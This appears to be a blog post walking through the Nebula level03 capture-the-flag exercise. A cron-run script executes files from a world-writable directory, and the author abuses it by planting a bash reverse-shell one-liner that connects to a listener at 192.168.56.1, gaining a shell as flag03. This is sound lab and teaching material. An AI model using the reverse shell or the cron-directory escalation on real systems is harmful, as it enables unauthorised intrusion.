Nebula - level03

This is my fourth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:




As we read the About section, we see that we need to check the home directory for 'flag03' and take note of the files. Additionally, there is a crontab that is called every couple of minutes.

With our task in hand, we SSH into the node and move to the /home/flag03 directory:

level03@nebula:~$ cd /home/flag03/
level03@nebula:/home/flag03$ ls -lah
total 5.5K
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     120 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
level03@nebula:/home/flag03$ 

2 things stand out. We have a world writable directory "writable.d" and a script (writable.sh) that is owned by flag03.

We cat the script to see what it should do:

level03@nebula:/home/flag03$ cat writable.sh 
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
 (ulimit -t 5; bash -x "$i")
 rm -f "$i"
done

level03@nebula:/home/flag03$ 

This is a very basic script. It has a for loop that checks the /home/flag03/writable.d directory and all its contents. If there's any contents, it will perform "ulimit" which will "get of set user limits". The -t flag is for cpu-time which is set to a maximum cpu time of 5 seconds. After this, it will invoke bash and execute the file located in writable.d and then it will remove the file.

My assumption here is that the crontab is calling the writable.sh script every couple minutes. Depending on the owner of the crontab, it will execute as that user. However, we are unable to know this information.

So, what I do is create a reverse shell file and place it into the writable.d directory:

level03@nebula:/home/flag03$ echo "bash -i >& /dev/tcp/192.168.56.1/4444 0>&1" >  /home/level03/shell
level03@nebula:/home/flag03$ cp /home/level03/shell writable.d/
level03@nebula:/home/flag03$ ls -lah writable.d/
total 4.0K
drwxrwxrwx 1 flag03  flag03  60 2017-02-25 14:07 .
drwxr-x--- 1 flag03  level03 60 2011-11-20 20:39 ..
-rw-rw-r-- 1 level03 level03 43 2017-02-25 14:07 shell
level03@nebula:/home/flag03$ 

At this time, I also set up my listener on the same port:

eric@geoda:~$ nc -nlvp 4444
listening on [any] 4444 ...

I then wait:


eric@geoda:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.106] 55958
bash: no job control in this shell
flag03@nebula:~$ whoami
whoami
flag03
flag03@nebula:~$ getflag
getflag
You have successfully executed getflag on a target account
flag03@nebula:~$ 

As hoped, my shell hits and I am running as flag03! I getflag to confirm.

This exercise shows how crontabs can be exploited. It also shows that if there are world writable directories that are owned by higher privilege users, it too can be exploited.

Thanks for reading!

-geoda